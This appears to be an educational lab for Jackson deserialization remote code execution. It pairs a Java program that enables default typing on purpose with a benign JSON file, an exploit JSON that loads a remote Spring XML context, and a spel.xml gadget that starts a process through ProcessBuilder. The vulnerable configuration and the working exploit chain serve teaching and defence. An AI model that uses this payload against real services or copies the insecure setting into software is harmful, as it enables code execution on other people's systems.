
Java Deserializer (example 3)

App.java

package com.michalszalkowski;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.io.IOException;
import com.fasterxml.jackson.databind.ObjectMapper;

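public class App {
    /**
     * Reads the JSON file named on the command line into an {@link Inner} and prints its fields.
     *
     * <p>Demonstrates the insecure Jackson configuration: with default typing enabled, a property
     * declared as {@code Object} is deserialized according to a class name carried in the JSON
     * itself, so the input file decides which class gets instantiated. The mitigation is to leave
     * default typing off, or, where polymorphism is genuinely needed, to use
     * {@code activateDefaultTyping} with a {@code PolymorphicTypeValidator} that allow-lists the
     * expected types.
     *
     * @param args {@code args[0]} is the path of the JSON file to read
     * @throws IOException if the file cannot be read or the JSON cannot be mapped
     */
    public static void main(String[] args) throws IOException {
        // Fail with a usage message instead of an ArrayIndexOutOfBoundsException on args[0].
        if (args.length != 1) {
            System.err.println("usage: App <json-file>");
            System.exit(2);
        }

        ObjectMapper mapper = new ObjectMapper();
        // SECURITY: deprecated since Jackson 2.10 and unsafe on untrusted input -- this is the
        // setting that makes the Object-typed "obj" field honor a type name supplied by the JSON.
        mapper.enableDefaultTyping();

        // The file content, not the path, is the untrusted input here.
        byte[] json = Files.readAllBytes(Paths.get(args[0]));
        Inner data = mapper.readValue(json, Inner.class);

        System.out.println("Data id = " + data.id);
        System.out.println("Data obj = " + data.obj);
    }
}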

/** Target type for {@code App}'s {@code readValue}; Jackson binds the public fields by name. */
class Inner {
    // Plain value, bound from the "id" number in the JSON.
    public int id;
    // Declared as Object: with default typing enabled on the mapper, the JSON may carry a class
    // name for this property and Jackson instantiates that class -- this field is the
    // deserialization sink the example demonstrates.
    public Object obj;
}

spel.xml

<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
  <bean id="pb" class="java.lang.ProcessBuilder">
     <constructor-arg value="mousepad" />
     <property name="whatever" value="#{ pb.start() }"/>
  </bean>
</beans>

test-legit.json

{
    "id": 123,
    "obj": "Lorem Ipsum"
}

test-exploit.json

{
    "id": 123, 
    "obj": [
        "org.springframework.context.support.FileSystemXmlApplicationContext", 
        "http://127.0.0.1:8080/spel.xml"
    ]
}

run

mvn clean install

java -jar target/jackson-rce-1.0-jar-with-dependencies.jar test-legit.json
java -jar target/jackson-rce-1.0-jar-with-dependencies.jar test-exploit.json